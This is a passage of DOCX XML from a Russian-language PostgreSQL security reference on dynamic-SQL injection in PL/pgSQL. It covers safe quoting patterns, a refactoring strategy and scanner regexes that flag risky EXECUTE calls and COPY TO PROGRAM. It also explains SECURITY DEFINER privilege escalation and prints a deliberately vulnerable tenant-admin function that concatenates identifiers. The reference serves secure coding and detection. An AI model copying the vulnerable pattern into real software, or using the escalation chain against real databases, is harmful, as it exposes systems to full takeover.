        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">используется без сопровождающих защитных функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Allowed patterns:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Legitimate: || c quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM ' || quote_ident(tbl_name) || ' WHERE id = $1' USING row_id;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Legitimate: || с quote_literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT count(*) FROM logs WHERE level = ' || quote_literal(lvl);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- (но USING предпочтительнее для plan-cache)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Legitimate: || для static literal + dynamic identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'CREATE INDEX ON ' || quote_ident(tbl_name) || ' (created_at)';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- DDL — нет USING для CREATE, только identifier через quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">с защитными вызовами</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функционально как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стилистически старее. Pattern допустим, но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рекомендуется как более читаемый и менее error-prone (одно forget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-chain — уже уязвимость).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Refactoring strategy для legacy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Найти все функции с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE ... ||</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pg_proc.prosrc LIKE '%EXECUTE%||%'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2. Для каждой определить, какие параметры — identifier, какие — value, какие — DDL-fragment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Identifier → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', x)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Value → USING. DDL-fragment → whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. RAISE NOTICE / RAISE DEBUG → удалить или преобразовать в structured logging без full SQL.</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Статический сканер</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EXECUTE\s*[^']*'[^']*'\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat после EXECUTE-string без format.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\|\|\s*[a-z_]+\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметр посреди concat-chain.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одинарные кавычки вокруг concat (value position без quote_literal).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prosrc ~ 'EXECUTE\s.*\|\|'</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prosrc !~ '\\Wformat\\W'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — concat без format.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prosrc ~ '\|\|\s*[a-z_]+\s*\|\|.*''' AND prosrc !~ 'quote_literal'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — value-concat без quote_literal.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prosrc LIKE '%RAISE NOTICE%executing%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — debug-leak в logs.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EXECUTE-вычисленные SQL с DROP/COPY TO PROGRAM/UNION в нетипичных contexts.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`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: дополнительные statements внутри EXECUTE (стек-trace plpgsql) — необычно долгие планы.</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версии PG с plpgsql (≥ 6.x).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operator существует во всех версиях SQL92+. Никакие фиксы — application/database-developer level antipattern.</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3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — defines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как правильный identifier-инструмент; 3.16.4 — что бывает без него.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3.16.2 quote_ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функциональный эквивалент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для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-pattern (allowed когда правильно используется).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3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — правильный value-инструмент; 3.16.4 — value-concat-injection без USING.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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — где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-injection эскалирует в полный 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Variant A основной канал.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Variant B и C основной механизм.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 PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant C финальный 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5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая reference по защитным функциям.</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«PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN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«String Functions and Operators» /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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-string.html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2ndQuadrant blog: «Anti-pattern: Building queries via string concatenation» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/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depesz blog: «Why prefer format() over ||-concat» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/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OWASP: «SQL Injection Prevention Cheat Sheet» — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html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Wiki: «Don't Do This» / Dynamic SQL antipatterns — https://wiki.postgresql.org/wiki/Don't_Do_This</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.5 SECURITY DEFINER + dynamic SQL — комбо</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Самая опасная конфигурация identifier-injection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic SQL внутри SECURITY DEFINER функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. SECURITY DEFINER переключает context на owner функции; dynamic SQL без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/USING позволяет injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> означает, что любая injection-точка в теле функции исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">с правами owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, типично superuser или DBA. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">эскалация по двум осям одновременно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: (1) identifier-injection (3.16.1–3.16.4) + (2) privilege escalation (3.13.6 — параллельный класс через search_path в SECURITY DEFINER). Граница с 3.13.6: 3.13.6 — hijack unqualified-имени </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без injection в SQL-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через подмену функции в pg_temp); 3.16.5 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">прямая injection в SQL-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dynamic SQL под privileged context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если SECURITY DEFINER функция уязвима к identifier-injection — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">automatic privilege escalation chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: payload получает права owner-а, без необходимости в отдельных prior escalation steps. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">самый частый realistic source RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в production-PostgreSQL: разработчик создаёт «utility»-функцию для admin-tasks с SECURITY DEFINER (потому что она должна работать под superuser), забывает про identifier-injection — и атакующий с обычной EXECUTE-привилегией получает full DBA-control.</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"Utility" функция для tenant-admin tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Owner: postgres (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- USAGE на функцию выдан application_admin role (не superuser, но admin своих tenant-schemas)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admin.refresh_tenant_stats(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_schema text,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    target_table text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RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER       -- ← critical: исполняется под postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ВНИМАНИЕ: SET search_path отсутствует — также уязвимо к 3.13.6!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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АНТИПАТТЕРН: identifier через f-string-style concat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE 'ANALYZE ' || tenant_schema || '.' || target_table;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE 'REINDEX TABLE ' || tenant_schema || '.' || target_table;</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GRANT EXECUTE ON FUNCTION admin.refresh_tenant_stats(text, text) TO application_admin;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий: разработчик хотел дать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возможность запускать ANALYZE/REINDEX на своих tenant-таблицах (что требует superuser в стандартном PG до 17). SECURITY DEFINER позволяет: caller </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
